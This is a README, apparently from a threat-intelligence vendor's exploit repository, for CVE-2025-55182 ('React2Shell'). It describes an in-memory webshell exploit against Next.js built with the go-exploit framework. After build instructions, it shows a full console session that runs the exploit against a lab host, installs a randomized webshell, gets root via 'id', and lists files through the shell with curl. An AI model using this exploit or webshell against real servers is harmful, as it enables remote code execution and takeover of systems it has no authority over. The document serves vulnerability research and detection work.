## https://sploitus.com/exploit?id=27D1C3D3-C08C-58A6-BD30-7D9E1E2B663B
# CVE-2025-55182: Exploitation Artifacts
An export of a small subset of the [VulnCheck Initial Access Intelligence](https://www.vulncheck.com/product/initial-access-intelligence) artifacts for the CVE-2025-55182 React2Shell vulnerability. Some of the teams observations on these artifacts can be read in [the blog post](https://www.vulncheck.com/blog/reacting-to-shells-react2shell-variants-ecosystem).
## Index
* [./inmem-webshell](inmem-webshell) - An in-memory webshell variant
### Building
All components are built from our exploit framework [go-exploit](https://github.com/vulncheck-oss/go-exploit). Each directory contains a copy of the interesting artifact.
If you have a Go build environment handy with `golangci-lint` and GNU `make`, you can use `make`:
```console
$ make
gofmt -d -w cve-2025-55182.go
golangci-lint run --fix --timeout 3m cve-2025-55182.go
0 issues.
GOOS=linux GOARCH=amd64 go build -o build/cve-2025-55182_linux-amd64 cve-2025-55182.go
```
To build the exploit into a docker image simply:
```console
make docker
```
### In-Memory NextJS Webshell
This is an implementation of an in memory webshell against next.js using React2Shell. We first saw this demonstrated [here](https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478?tab=readme-ov-file#-runtime-memory-shell-). The webshell is randomized on each new attack.
```console
poptart@grimm $ ./build/cve-2025-55182_linux-amd64 -rhost 172.17.0.1 -rport 3000 -e
time=2025-12-08T15:28:06.892-07:00 level=STATUS msg="Starting target" index=0 host=172.17.0.1 port=3000 ssl=false "ssl auto"=false
time=2025-12-08T15:28:06.892-07:00 level=STATUS msg="Generating webshell payload"
time=2025-12-08T15:28:06.893-07:00 level=STATUS msg="Uploading webshell to target"
time=2025-12-08T15:28:16.902-07:00 level=ERROR msg="HTTP request error: Post \"http://172.17.0.1:3000/\": context deadline exceeded (Client.Timeout exceeded while awaiting headers)"
time=2025-12-08T15:28:16.902-07:00 level=SUCCESS msg="Webshell installed!" location=http://172.17.0.1:3000/UByGoR
time=2025-12-08T15:28:16.902-07:00 level=STATUS msg="Testing `id`" testurl="http://172.17.0.1:3000/UByGoR?z=id"
time=2025-12-08T15:28:16.917-07:00 level=SUCCESS msg="uid=0(root) gid=0(root) groups=0(root)\n"
time=2025-12-08T15:28:16.917-07:00 level=SUCCESS msg="Exploit successfully completed" exploited=true
poptart@grimm $ curl http://172.17.0.1:3000/UByGoR?z=ls%20-l
total 72
-rw-r--r-- 1 root root 77 Dec 4 23:41 jsconfig.json
-rw-r--r-- 1 root root 92 Dec 4 23:41 next.config.mjs
drwxr-xr-x 172 root root 173 Dec 4 23:41 node_modules
-rw-r--r-- 1 root root 16384 Dec 4 23:41 notes.db
-rw-r--r-- 1 root root 123663 Dec 4 23:41 package-lock.json
-rw-r--r-- 1 root root 467 Dec 4 23:41 package.json
-rw-r--r-- 1 root root 6028 Dec 4 23:41 seed.sql
drwxr-xr-x 3 root root 3 Dec 4 23:41 src
```